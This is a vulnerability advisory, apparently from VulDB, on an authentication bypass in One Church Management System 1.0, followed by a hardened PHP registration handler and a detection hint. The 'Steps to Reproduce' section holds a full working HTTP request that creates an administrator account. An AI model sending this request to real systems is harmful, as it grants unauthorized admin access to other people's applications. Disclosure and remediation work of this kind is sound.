Submit #33217: One Church Management System 1.0 - Authentication Bypass

Title: One Church Management System 1.0 - Authentication Bypass
Description:
# Exploit Title: One Church Management System 1.0 - Authentication Bypass
# Date: 23/03/2022
# Exploit Author: Mr Empy
# Software Link: https://www.sourcecodester.com/php/15225/church-management-software-free-download-full-version.html
# Version: 1.0
# Tested on: Linux

Title:
================
One Church Management System 1.0 - Authentication Bypass

Summary:
================
One Church Management System version 1.0 is affected by a vulnerability that allows an attacker to bypass authentication. Because of the lack of session validation, the attacker could register a user with administrative permissions over the application and gain full access to it.

Severity Level:
================
7.3 (High)
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Affected Product:
================
One Church Management System v1.0

Steps to Reproduce:
================
1. Open a request repeater (like Burp Suite) and send this request:

POST /one_church/userregister.php HTTP/1.1
Host: target.com
Content-Length: 164
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://target.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://target.com/one_church/userregister.php
Accept-Encoding: gzip, deflate
Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

dignity=Admin&staffid=1000&fullname=<NICKNAME_HERE>&firstname=<FIRST_NAME>&lastname=<LAST_NAME>&mobileno=2520000000&emailid=<YOUR_EMAIL>&password=<YOUR_PASSWORD>&confirmpassword=<YOUR_PASSWORD>&signup=Register

Fill in the parameters with the values according to each one of them and send the request.
Source: https://www.sourcecodester.com/php/15225/church-management-software-free-download-full-version.html?a
User: mrempy (UID 24379)
Submission: 23.03.2022 15:11 (4 years ago)
Moderation: 24.03.2022 01:28 (10 hours later)
Status: Accepted
VulDB Entry: 195643 [SourceCodester One Church Management System 1.0 Session userregister.php weak authentication]
Points: 20
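The root cause named in the description above is a registration endpoint that trusts a client-supplied role (dignity=Admin) and performs no session validation. The following is an added, defender-side example of what a hardened userregister.php handler looks like; it is not the One Church Management System's own code, and it assumes a PDO connection in $pdo, a users table with the columns used in the request, and a session that stores user_id, dignity and csrf_token for logged-in users.

```php
<?php
// Hypothetical hardened registration handler (added example, not the
// project's code). Assumptions: $pdo is a configured PDO connection; the
// session of a logged-in user carries user_id, dignity and csrf_token.
session_start();

// 1. Session validation: only an authenticated administrator may create
//    accounts. The reported issue is that no such check existed, so any
//    anonymous POST could create a user.
if (empty($_SESSION['user_id']) || ($_SESSION['dignity'] ?? '') !== 'Admin') {
    http_response_code(403);
    exit('Administrator login required to register accounts.');
}

// 2. CSRF token bound to the admin session, so an administrator's browser
//    cannot be made to submit this form on someone else's behalf.
if (!hash_equals($_SESSION['csrf_token'] ?? '', $_POST['csrf_token'] ?? '')) {
    http_response_code(403);
    exit('Invalid CSRF token.');
}

// 3. The role is never taken verbatim from the request body. It is matched
//    against a server-side allow-list (assumed role names) and anything
//    else, including "Admin", falls back to the least-privileged value.
$allowedRoles = ['Staff', 'Member'];
$requested    = $_POST['dignity'] ?? 'Member';
$dignity      = in_array($requested, $allowedRoles, true) ? $requested : 'Member';

// 4. Basic input validation and password hashing.
$email    = filter_var($_POST['emailid'] ?? '', FILTER_VALIDATE_EMAIL);
$password = $_POST['password'] ?? '';
if ($email === false || strlen($password) < 12
    || $password !== ($_POST['confirmpassword'] ?? null)) {
    http_response_code(400);
    exit('Invalid registration data.');
}
$hash = password_hash($password, PASSWORD_DEFAULT);

// 5. Prepared statement so the remaining fields cannot alter the query.
$stmt = $pdo->prepare(
    'INSERT INTO users (staffid, fullname, firstname, lastname, mobileno, emailid, password, dignity)
     VALUES (?, ?, ?, ?, ?, ?, ?, ?)'
);
$stmt->execute([
    $_POST['staffid'] ?? '', $_POST['fullname'] ?? '', $_POST['firstname'] ?? '',
    $_POST['lastname'] ?? '', $_POST['mobileno'] ?? '', $email, $hash, $dignity,
]);
```

For detection, an unauthenticated POST to userregister.php whose body carries dignity=Admin is the request shape to alert on; the session check above also turns such attempts into 403 responses that are easy to count in the access log.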
